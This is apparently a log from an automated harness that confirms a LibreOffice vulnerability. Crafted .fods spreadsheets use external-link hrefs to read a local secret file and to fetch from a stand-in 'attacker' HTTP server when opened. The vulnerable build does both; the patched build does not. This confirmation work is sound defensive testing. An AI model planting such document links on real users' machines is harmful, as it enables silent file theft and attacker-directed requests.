[setup] LibreOffice 26.2.4.2 already extracted at /workspace/bundle/artifacts/libreoffice/vuln-26.2.4.2 [setup] LibreOffice 26.2.5.2 already extracted at /workspace/bundle/artifacts/libreoffice/fixed-26.2.5.2 [setup] vulnerable build: LibreOffice 26.2.4.2 0229ac93fcf0d7cbc6376066c6f35021cef002dc [setup] fixed build: LibreOffice 26.2.5.2 cd7284b4cbbfeb507e630c1aac019f4157393acb /workspace/bundle/artifacts/work/httpd.py:7: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC). f.write("%s GET %s from %s\n" % (datetime.datetime.utcnow().isoformat(), self.path, self.client_address[0])) [setup] attacker HTTP server healthy on 127.0.0.1:8931 === VULNERABLE BUILD (26.2.4.2) === [run] vuln-lfi-1: opening /workspace/bundle/artifacts/work/doc-vuln-lfi-1.fods (href=file:///workspace/bundle/artifacts/work/local_secret.csv) with /workspace/bundle/artifacts/libreoffice/vuln-26.2.4.2/opt/libreoffice26.2/program/soffice [run] vuln-lfi-1: sheet content: CVE-2026-63267_LFI_SECRET_9f4d2c [run] vuln-lfi-2: opening /workspace/bundle/artifacts/work/doc-vuln-lfi-2.fods (href=file:///workspace/bundle/artifacts/work/local_secret.csv) with /workspace/bundle/artifacts/libreoffice/vuln-26.2.4.2/opt/libreoffice26.2/program/soffice [run] vuln-lfi-2: sheet content: CVE-2026-63267_LFI_SECRET_9f4d2c [run] vuln-ssrf-1: opening /workspace/bundle/artifacts/work/doc-vuln-ssrf-1.fods (href=http://127.0.0.1:8931/CVE-2026-63267-SSRF-vuln-ssrf-1.csv) with /workspace/bundle/artifacts/libreoffice/vuln-26.2.4.2/opt/libreoffice26.2/program/soffice [run] vuln-ssrf-1: sheet content: CVE-2026-63267-SSRF_SERVED [run] vuln-ssrf-2: opening /workspace/bundle/artifacts/work/doc-vuln-ssrf-2.fods (href=http://127.0.0.1:8931/CVE-2026-63267-SSRF-vuln-ssrf-2.csv) with /workspace/bundle/artifacts/libreoffice/vuln-26.2.4.2/opt/libreoffice26.2/program/soffice [run] vuln-ssrf-2: sheet content: CVE-2026-63267-SSRF_SERVED === FIXED BUILD (26.2.5.2) === [run] fixed-lfi-1: opening /workspace/bundle/artifacts/work/doc-fixed-lfi-1.fods (href=file:///workspace/bundle/artifacts/work/local_secret.csv) with /workspace/bundle/artifacts/libreoffice/fixed-26.2.5.2/opt/libreoffice26.2/program/soffice [run] fixed-lfi-1: sheet content: SAVED_SENTINEL_NOT_FETCHED [run] fixed-lfi-2: opening /workspace/bundle/artifacts/work/doc-fixed-lfi-2.fods (href=file:///workspace/bundle/artifacts/work/local_secret.csv) with /workspace/bundle/artifacts/libreoffice/fixed-26.2.5.2/opt/libreoffice26.2/program/soffice [run] fixed-lfi-2: sheet content: SAVED_SENTINEL_NOT_FETCHED [run] fixed-ssrf-1: opening /workspace/bundle/artifacts/work/doc-fixed-ssrf-1.fods (href=http://127.0.0.1:8931/CVE-2026-63267-SSRF-fixed-ssrf-1.csv) with /workspace/bundle/artifacts/libreoffice/fixed-26.2.5.2/opt/libreoffice26.2/program/soffice [run] fixed-ssrf-1: sheet content: SAVED_SENTINEL_NOT_FETCHED [run] fixed-ssrf-2: opening /workspace/bundle/artifacts/work/doc-fixed-ssrf-2.fods (href=http://127.0.0.1:8931/CVE-2026-63267-SSRF-fixed-ssrf-2.csv) with /workspace/bundle/artifacts/libreoffice/fixed-26.2.5.2/opt/libreoffice26.2/program/soffice [run] fixed-ssrf-2: sheet content: SAVED_SENTINEL_NOT_FETCHED [verdict] vulnerable LFI hits: 2/2 [verdict] vulnerable SSRF hits: 2/2 [verdict] fixed LFI clean: 2/2 [verdict] fixed SSRF clean: 2/2 [verdict] CVE-2026-63267 CONFIRMED: vulnerable build performed LFI + attacker-directed GET on document open; fixed build did not